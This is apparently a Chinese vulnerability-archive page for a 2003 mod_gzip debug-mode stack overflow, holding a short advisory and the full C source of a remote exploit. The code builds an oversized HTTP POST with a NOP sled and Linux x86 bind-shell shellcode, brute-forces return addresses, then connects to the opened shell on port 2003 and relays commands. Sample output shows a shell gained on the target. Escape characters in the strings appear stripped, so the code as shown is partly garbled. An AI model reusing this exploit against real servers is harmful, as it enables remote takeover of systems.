Mod_Gzip 1.3.x – Debug Mode
| 漏洞ID | 1053864 | 漏洞类型 | |
| 发布时间 | 2003-05-06 | 更新时间 | 2003-05-06 |
![图片[1]-Mod_Gzip 1.3.x – Debug Mode-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-Mod_Gzip 1.3.x – Debug Mode-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Unix | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7769/info
Mod_gzip is reported prone to a stack overflow, format string vulnerability and a file corruption issue due to a predictable naming scheme for log files. Exploitation of these issues could result in execution of malicious instructions or corruption of critical or sensitive files. These issues reportedly only occur when the software is run in debug mode.
/*
[exploit code] for mod_gzip (with debug_mode) <= 1.2.26.1a
/
Created by xCrZx [[email protected]] /05.06.03/
/
Tested on RedHat 8.0 (Psyche) (here is target for it), also tested on FreeBSD 4.7 (1.3.19.2a) (here is no target for it :)
/
*/
/*
/ Single mode:
/ [crz@blacksand crz]$ ./85mod_gzip -t 0 -h localhost
/ remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
by xCrZx [[email protected]] /05.06.03/
/
Using: ret_err = 0x42127480, ret = 0xbfffd8f0
/
[!] Connecting to localhost:80
/ [+] Connected!
[*] Trying to connect to localhost:2003 port!!! Pray for success!
/ [*] Sleeping at 2 seconds...
/ [!] Shell is accessible!
/ uid=99(nobody) gid=99(nobody) groups=99(nobody)
Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/
Brute mode:
/
[crz@blacksand crz]$ ./85mod_gzip -h localhost -b 0xbfffffff -s 1000
/
remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
/ by xCrZx [[email protected]] /05.06.03/
/ Using: ret_err = 0x42127480, ret = 0xbfffffff ,step = 1000
/ [~] Brutemode activated!
.
/ [!] Shell is accessible!
/ uid=99(nobody) gid=99(nobody) groups=99(nobody)
Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/
*/
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#define STEP 1000
char fmt[] =
"POST /?%s HTTP/1.1rn"
"Content-Type: text/htmlrn"
"Host: %srn"
"Content-Length: %drn"
"Accept-Encoding: gzip, deflaternrn"
"%srnrn";
struct TARGETS {
char *distr;
long ret;
long std_err;
char *shellcode;
char *jmp;
} targets[] = {
/* you can add targets here */
{"RedHat 8.0 (Psyche)", // disributive info
0xbfffd8f0, // return address in stack
0x42127480, // address of stderr
//shellcode for Linux x86 -> bind shell on 2003 port//
"x31xc0x89xc3xb0x02xcdx80x38xc3x74x05x8dx43x01xcdx80"
"x31xc0x89x45x10x40x89xc3x89x45x0cx40x89x45x08x8dx4d"
"x08xb0x66xcdx80x89x45x08x43x66x89x5dx14x66xc7x45x16"
"x07xd3x31xd2x89x55x18x8dx55x14x89x55x0cxc6x45x10x10"
"xb0x66xcdx80x40x89x45x0cx43x43xb0x66xcdx80x43x89x45"
"x0cx89x45x10xb0x66xcdx80x89xc3x31xc9xb0x3fxcdx80x41"
"x80xf9x03x75xf6x31xd2x52x68x6ex2fx73x68x68x2fx2fx62"
"x69x89xe3x52x53x89xe1xb0x0bxcdx80",
/*
special jump instruction (to avoid bad characters in url):
(jump on our shellcode into heap)
movl $0xa1a51baa,%ebx
addl $0x66666666,%ebx
jmp *%ebx
*/
"xbbxaax1bxa5xa1x81xc3x66x66x66x66xffxe3"
} };
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
void usage(char *prog) {
int i=0;
printf("nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr] [-b addr] [-s step_num]nnTargets:n",prog);
while(targets[i++].distr) printf("t[%d] -> %sn",i-1,targets[i-1].distr);
printf("n");
exit(0);
}
int main(int argc, char **argv) {
int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[20000];
char buf1[5000],buf2[10000];
int sock;
fd_set rset;
int port=80,shellport=2003;
int step=STEP;
char *victim=NULL;
long ret=0xbfffffff,ret_err;
int brutemode=0;
char *shellcode,*jmp;
int trg=0;
printf("nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]ntt by xCrZx [[email protected]] /05.06.03/n");
for(i=0;i<argc;i++) {
if(argv[i][1]=='h') victim=argv[i+1];
if(argv[i][1]=='p') port=atoi(argv[i+1]);
if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);
if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
}
if(!victim || ret==0) usage(argv[0]);
ret_err=targets[trg].std_err;
shellcode=targets[trg].shellcode;
jmp=targets[trg].jmp;
printf("nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);
if(brutemode) printf(" ,step = %dn",step);
printf("n");
if(brutemode)printf("[~] Brutemode activated!n");
do {
sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(port);
if(!brutemode)printf("n[!] Connecting to %s:%dn",victim,port);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
if(!brutemode)printf("[+] Connected!n",i);
memset(tmp ,0x00,sizeof tmp );
memset(buf1,0x00,sizeof buf1);
memset(buf2,0x00,sizeof buf2);
memset(buf1,0x90,2016);
memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
memset(buf1+strlen(buf1),0x90,2280);
*(long *)&buf1[strlen(buf1)]=ret_err;
for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;
memset(buf2,0x90,1000);
memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode));
sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
write(sock,tmp,strlen(tmp));
}else { printf("[x] Error: Could not connect to %s:%d!n",victim,port);exit(0);}
close(sock);
ret-= step;
if(brutemode) {printf(".");fflush(stdout);}
if(!brutemode) {
printf("[*] Trying to connect to %s:%d port!!! Pray for success!n",victim,shellport);
printf("[*] Sleeping at 2 seconds...n");
}
sleep(2);
sock=socket(PF_INET,SOCK_STREAM,0);
bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero));
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(shellport);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
printf("n[!] Shell is accessible!nn");
write(sock, "id;uname -an", 12);
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sock, &rset)) {
i = read(sock, tmp, sizeof(tmp) - 1);
if (i <= 0) {
printf("[!] Connection closed.n");
close(sock);
exit(0);
}
tmp[i] = 0;
printf("%s", tmp);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
if (i > 0) {
tmp[i]=0;
write(sock, tmp, i);
}
}
}
} else if(!brutemode)printf("[x] Shell is inaccessible..nn");
close(sock);
} while ( brutemode );
return 0;
}相关推荐: Floosietek FTGate USER Command Mailbox Lock Vulnerability
Floosietek FTGate USER Command Mailbox Lock Vulnerability 漏洞ID 1102305 漏洞类型 Access Validation Error 发布时间 2002-04-04 更新时间 2002-04-0…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666